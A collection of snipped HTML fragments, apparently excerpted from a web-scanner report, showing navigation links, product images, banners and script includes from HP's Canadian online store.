http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Category&v1=ENVY&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_envy_notebooks"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb5_70.gif" width="70"    height="70"    border="0" title="ENVY laptop PCs"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_notebook_batteries" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb6_70.gif" width="70"    height="70"    border="0" title="Laptop batteries"></a>
...[SNIP]...
p/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=See%20all&v1=series&jumpID=in_R329_prodexp/hhoslp/psg/lateralnav_all_customizable_laptop_mini_netbook_series"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb7_70.gif" width="70"    height="70"    border="0" title="All customizable laptop PCs"></a>
...[SNIP]...
hopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_notebook&category=rts_notebook&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/nb8_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
ebapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=Everyday%20computing&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_everyday_computing_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt1_70.gif" width="70"    height="70"    border="0" title="Everyday computing desktop pcs"></a>
...[SNIP]...
g.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=Slim%20and%20sleek&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_slim_sleek_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt2_70.gif" width="70"    height="70"    border="0" title="Slim and sleek desktop PCs"></a>
...[SNIP]...
ing.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One%20PCs&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_in_one_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt3_70.gif" width="70"    height="70"    border="0" title="All-in-One pcs"></a>
...[SNIP]...
.com/webapp/shopping/store_access.do?template_type=computer_store&landing=desktops&a1=Category&v1=TouchSmart%20PCs&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_TouchSmart_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt4_70.gif" width="70"    height="70"    border="0" title="TouchSmart All-in-One PCs"></a>
...[SNIP]...
om/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=High%20performance&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_high_performance_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt5_70.gif" width="70"    height="70"    border="0" title="High performance desktop PCs"></a>
...[SNIP]...
ng.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=See+all&v1=series&jumpID=in_R329_prodexp/hhoslp/psg/lateralnav_all_customizable_desktop_series"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt6_70.gif" width="70"    height="70"    border="0" title="All customizable desktop PCs "></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_desktop&category=rts_desktop&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt7_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/display/display/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_monitors" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/dt8_70.gif" width="70"    height="70"    border="0" title="Monitors"></a>
...[SNIP]...
f="http://www.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_tablet&category=rts_tablet&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_touchpads" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/tb2_70.gif" width="70"    height="70"    border="0" title="TouchPads"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/handheld/iPAQ/2/storefronts?sort=Desc&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_smartphones" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/tb3_70.gif" width="70"    height="70"    border="0" title="Smartphones"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Notebook/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_extended_service_plan_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh1_70.gif" width="70"    height="70"    border="0" title="HP Care Packs for Laptops"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Desktop/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_desktops"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh2_70.gif" width="70"    height="70"    border="0" title="HP Care Packs for Desktops"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/esp/Printer/1/storefronts?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_extended_service_plan_printers" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/sh3_70.gif" width="70" height="70" border="0" title="HP Care Packs for Printers"></a>
...[SNIP]...
ef="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Photosmart&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_photosmarts"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p1_70.gif"    width="70" height="70" border="0"    title="Photosmart"></a>
...[SNIP]...
href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Officejet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_officejets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p2_70.gif"    width="70" height="70" border="0"    title="Officejet"></a>
...[SNIP]...
ttp://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Officejet+Pro&catLevel=1&storeName=storefronts&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_officejet_pro"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p3_70.gif"    width="70" height="70" border="0"    title="Officejet Pro"></a>
...[SNIP]...
a href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=LaserJet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_laserjets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p4_70.gif"    width="70" height="70" border="0"    title="LaserJet"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=Deskjet&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_deskjets"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p5_70.gif"    width="70" height="70" border="0"    title="Deskjet"></a>
...[SNIP]...
ww.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=all-in-one&catLevel=1&storeName=storefronts&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_multi_function_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p6_70.gif"    width="70" height="70" border="0"    title="All all-in-one printers"></a>
...[SNIP]...
Name=storefronts&landing=printer&category=HP&orderflow=1&a1=Wireless+capability%0D%0A&v1=Yes&catLevel=2#bcAnchor&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_wireless_all_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p7_70.gif"    width="70" height="70" border="0"    title="All wireless printers"></a>
...[SNIP]...
shopping.hp.com/webapp/shopping/can.do?landing=printer&lanAttr=HP+ePrint&category=Yes&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_eprint_printers"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/p8_70.gif"    width="70" height="70" border="0"    title="All ePrint printers"></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/print_supp_acc_landing.do?landing=supplies&selectMenu=cartridges_paper&suppliesType=ink&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_ink_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s1_70.gif"    width="70" height="70" border="0"    title="Ink"></a>
...[SNIP]...
opping.hp.com/webapp/shopping/print_supp_acc_landing.do?landing=supplies&selectMenu=cartridges_paper&suppliesType=toner&jumpID=in_R329_prodexp/hhoslp/ipg/lateralnav_toner_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s2_70.gif"    width="70" height="70" border="0"    title="Toner"></a>
...[SNIP]...
f="http://www.shopping.hp.com/webapp/shopping/supplies_category.do?landing=printing_supplies&category=paper&cat_level=1?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_paper_supplies"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/s3_70.gif"    width="70" height="70" border="0"    title="Paper"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_electronics"    class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp1_70.gif" width="70"    height="70"    border="0" title="All electronics"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tvs" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp2_70.gif" width="70"    height="70"    border="0" title="TVs"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_digital_cameras" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp3_70.gif" width="70"    height="70"    border="0" title="Cameras &amp; video"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_deals_on_electronics"     class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp4_70.gif" width="70"    height="70"    border="0" title="Deals on electronics"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/photo_frames/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_lateralnav_photo_frames"    class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp5_70.gif" width="70"    height="70"    border="0" title="Photo frames"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/calculator/HP/1/storefronts?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_calculators" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp6_70.gif" width="70"    height="70"    border="0" title="Calculators"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/software/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_software" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp7_70.gif" width="70"    height="70"    border="0" title="Boxed Software"></a>
...[SNIP]...
<p align="center" class="col21pctL    p5 m0"><a    href="http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?jumpid=ex_hpds_lateralnav_download" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp8_70.gif" width="70"    height="70"    border="0" title="Downloadable Software (non-HP, partner site)"></a><br><a    href="http://hp.digitalriver.com/store/hpappli/DisplayHomePage/?jumpid=ex_hpds_lateralnav_download" class="colorFFFFFF">Downloadable<br>
...[SNIP]...
<a href="http://www.shopping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_all_accessories" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a1_70.gif"    width="70" height="70" border="0"    title="All accessories"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_storage" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a2_70.gif"    width="70" height="70" border="0"    title="Storage"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_peripherals" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a3_70.gif"    width="70" height="70" border="0"    title="Keyboards & Mice"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_deals_on_accessories"     class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a4_70.gif"    width="70" height="70" border="0"    title="Deals on accessories"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_carrying_cases" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a5_70.gif"    width="70" height="70" border="0"    title="Cases"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/networking/2/accessories?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_networking" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a6_70.gif" width="70"    height="70"    border="0" title="Networking"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/can/computer/categories/speakers_headsets/1/accessories?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_lateralnav_pc_audio" class="colorFFFFFF"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a7_70.gif" width="70"    height="70"    border="0" title="PC Audio"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/accessories-store/touchpad?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_touchpad_accessories" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/a8_70.gif" width="70"    height="70"    border="0" title="TouchPad accessories"></a>
...[SNIP]...
//www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=notebooks&a1=Usage&v1=Business&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc1_70.gif"    width="70" height="70" border="0"    title="Laptop PCs and netbooks"></a>
...[SNIP]...
shopping/can.do?storeName=storefronts&landing=rts_notebook&category=rts_notebook&a1=Category&v1=business&catLevel=2#bcAnchor&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_elitebook" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc2_70.gif"    width="70" height="70" border="0"    title="Elitebook and Probook business laptop PCs"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/esp?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc3_70.gif"    width="70" height="70" border="0"    title="HP Care Pack Services"></a>
...[SNIP]...
ww.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=servers&a1=See%20all&v1=series&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_home_servers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc4_70.gif"    width="70" height="70" border="0"    title="Servers"></a>
...[SNIP]...
p://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Usage&v1=Business&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_desktops" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc5_70.gif"    width="70" height="70" border="0"    title="Desktop and all-in-one PCs"></a>
...[SNIP]...
ttp://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=storefronts&landing=display&category=display&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_business_monitors" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc6_70.gif"    width="70" height="70" border="0"    title="Monitors"></a>
...[SNIP]...
="http://www.shopping.hp.com/webapp/shopping/can.do?landing=printer&category=office&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_business_printers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc7_70.gif"    width="70" height="70" border="0"    title="Printers and all-in-ones"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=all_supplies&jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_business_ink_and_toner" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/hoc8_70.gif "    width="70" height="70" border="0"    title="Ink, Toner & Paper"></a>
...[SNIP]...
hopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_notebook&category=rts_notebook&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_notebooks" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs1_70.gif" width="70"    height="70"    border="0" title="Quick-ship laptops PCs available to ship within 24 hours"></a>
...[SNIP]...
w.shopping.hp.com/webapp/shopping/can.do?storeName=storefronts&catLevel=1&landing=rts_desktop&category=rts_desktop&jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_quick_ship_desktops" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs2_70.gif" width="70"    height="70"    border="0" title="Quick-ship desktop PCs available to ship within 24 hours"></a>
...[SNIP]...
ef="http://www.shopping.hp.com/webapp/shopping/express_store.do?landing=express_store&selectMenu=specialty_store&jumpid=in_R329_prodexp/hhoslp/split/lateralnav_quick_ship_products" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/qs3_70.gif" width="70"    height="70"    border="0" title="All Quick-ship products"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/webapp/shopping/offers_guide.do?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_hot_offers" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do1_70.gif" width="70"    height="70"    border="0" title="HP and partner offers on current products"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/outlet?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_outlet_centre"    class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do2_70.gif" width="70"    height="70"    border="0" title="Markdowns and closeout deals"></a>
...[SNIP]...
<a    href="http://www.shopping.hp.com/webapp/shopping/mpss_portal.do?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_mpr" class="colorFFFFFF"><img    src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/do3_70.gif" width="70"    height="70"    border="0" title="Exclusive offers on ink, toner, and paper"></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/go/microsoftoffers?jumpid=in_R329_prodexp/hhoslp/split/lateralnav_deals_banner/sitewide_top_nav_banner_xbox_offer_911" title='Click to see details'><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/topnav_sitewide_250x50_091111.jpg" width="250" height="50" border="0" alt="Click to see details" title ="Click to see details" longdesc=""></a>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/ri/mootools-1.2.2-core-jm.js'></script>
...[SNIP]...
<td><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="6"><h1>
...[SNIP]...
<td width="15"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="1"></td>
<td width="2" class="bold" valign="top"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="15"><br>
...[SNIP]...
<br><img src="http://hpshopping.speedera.net/www.shopping.hp.com/s.gif" width="1" height="2" alt="" longdesc=""></td>
<td width="15"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/mda_white_browse_214x60.gif" title="HP recommends Windows&#0174; 7" width="214" height="60"></td>
...[SNIP]...
<p class="w804" align="left" style="background: url('http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/free_shipping_top_bkgd_35.gif');"><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/accessories_deal_accyDeal_valueProp_g_812x35.jpg" width="804" height="35" border="0" alt="Why buy accessories & electronics from HP Home & Home Office?" title ="Why buy accessories & electronics from HP Home & Home Office?" longdesc=""></p>
...[SNIP]...
pping.hp.com/accessories-store/computer?jumpid=in_R329_prodexp/hhoslp/specialty_stores/design_center/top_banner/1/acc_page_banner_Accessory_Sale_918" title='Click to participate in the accessory sale'><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/accessories_deals_r1_804x285_091811.jpg" width="804" height="285" border="0" alt="Click to participate in the accessory sale" title ="Click to participate in the accessory sale" longdesc=""></a>
...[SNIP]...
ng_cases&jumpid=in_R329_prodexp/hhoslp/specialty_stores/design_center/top_banner/2/computer_accessories_top2_Save_20%_on_select_Carrying_cases_918" title='Click to save 20% on select Carrying cases
'><img style="" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/banners/accessories_deals_r2_804x285_091811.jpg" width="804" height="285" border="0" alt="Click to save 20% on select Carrying cases
" title ="Click to save 20% on select Carrying cases
" longdesc="">
</a>
...[SNIP]...
<ul class="ULbody2">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" wmode="transparent" width="804" height="222">
<param name="movie" value="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/swf/accessories_navigation.swf?hpUrl=http%3A%2F%2Fwww.shopping.hp.com/webapp/shopping&userTier=">
...[SNIP]...
<param name="FlashVars" value="hpUrl=http://www.shopping.hp.com/webapp/shopping&userTier=">
<embed src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/swf/accessories_navigation.swf?hpUrl=http%3A%2F%2Fwww.shopping.hp.com/webapp/shopping&userTier=" FlashVars="hpUrl=http://www.shopping.hp.com/webapp/shopping&userTier=" width="804" height="222" allowscriptaccess="always" wmode="transparent" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash"></embed>
</object><script type="text/javascript" language="JavaScript" src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/ieupdate.js"></script>
...[SNIP]...
<a href="http://www.shopping.hp.com/store/product/product_detail/BV704AA%2523ABA/1?jumpid=in_r329_personalization/browse1/home_PDP"><img src="http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/featured_fmt/bv704aa_main.jpg" width="50" height="50" longdesc="" alt="Click to see HP Pavilion p7-1020 Desktop PC" border="0" ></a>
...[SNIP]...
<a href="http://www.shopping.hp.com/series/category/desktops/p7xt_series/3/computer_store?jumpid=in_r329_personalization/browse2/home_SDP"><img src="http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/featured_fmt/lp011av_main.jpg" width="50" height="50" longdesc="" alt="Click to see p7xt series" border="0" ></a>
...[SNIP]...
<a href="/webapp/shopping/mpss_portal.do"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/mpss/tile_MPR6.gif" alt="My Print Rewards. Exclusive offers on ink, toner, and paper. Learn more." border="0" longdesc=""></a>
...[SNIP]...
<a href="#" onClick="window.open('http://www.facebook.com/HPhome','FacebookPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/fb_icon_25x25.gif" title="Follow us on Facebook" class="socialIcon"/></a>
...[SNIP]...
<a href="#" onClick="window.open('http://twitter.com/hpdeals','TwitterPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/twitter_icon_25x25.gif" alt="Follow us on Twitter" title="Follow us on Twitter" class="socialIcon" /></a>
...[SNIP]...
a href="#" onClick="window.open('http://h30417.www3.hp.com/p/subscribe','RSSpopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=630,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/rss_icon_25x25.gif" alt="Subscribe to our RSS feed" title="Subscribe to our RSS feed" class="socialIcon" /></a>
...[SNIP]...
e.jsp&webChat=0&click2Call=1','custOptionWindow', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0, menubar=0, width=850,height=300,left=200,top=100')" title="Customer Help Option Link"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_live_assist.gif" longdesc="" alt="Customer Help Option Link" border="0" style="vertical-align:middle;"></a>
...[SNIP]...
ycleyourPC','recycleYourPCWindow', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=850,height=500,left=200,top=100')" title="Free PC Recycling Assistance" class="bold"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_pc_recycle.gif" longdesc="" alt="Free PC Recycling Assistance" border="0" style="vertical-align:middle;"></a>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html#Explore"
target="LUCWindow"
title="Learn, Use, &amp; Create" />
<img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/LightBulb.gif"
style="vertical-align:middle;"
border=0
longDesc=""
alt="Learn, Use, &amp; Create">

</a>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/topRatedLanding.do"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/icon_top_rated_prod.gif" style="vertical-align:middle;" border=0 longDesc="" alt="Shop Top Rated"></a>
...[SNIP]...
</SCRIPT>

<script type="text/javascript" language="JavaScript" src='http://hpshopping.speedera.net/www.shopping.hp.com/shopping/jsi/newsletter_catalog_utils.js'></script>
...[SNIP]...
<a href="http://www.shopping.hp.com/webapp/shopping/home.do?jumpid=in_R329_prodexp/hhoslp/psg/bottomnav_home"> <img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hho_icon_home.gif" title="Home" width="17" height="20" border="0"/><span class="screenReading" style="font-size:105%;">
...[SNIP]...
<a href="#" onClick="window.open('http://www.facebook.com/HPhome','FacebookPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/fb_icon_25x25.gif" alt="Follow us on Facebook" title="Follow us on Facebook" /></a>
           <a href="#" onClick="window.open('http://twitter.com/hpdeals','TwitterPopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=800,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/twitter_icon_25x25.gif" alt="Follow us on Twitter" title="Follow us on Twitter" /></a>
           <a href="#" onClick="window.open('http://h30417.www3.hp.com/p/subscribe','RSSpopup', 'scrollbars=yes,resizable=yes,toolbar=no,directories=0,status=0,menubar=0, width=630,height=600,left=200,top=100');"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/rss_icon_25x25.gif" alt="RSS" title="RSS" /></a>
...[SNIP]...
<a href="https://www.shopping.hp.com/webapp/shopping/catalogRequest.do?jumpid=in_R329_prodexp/hhoslp/footer_request_catalog"><img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/footer_request_catalog.gif" alt="Request a Catalog" title="Request a Catalog"/></a>
...[SNIP]...
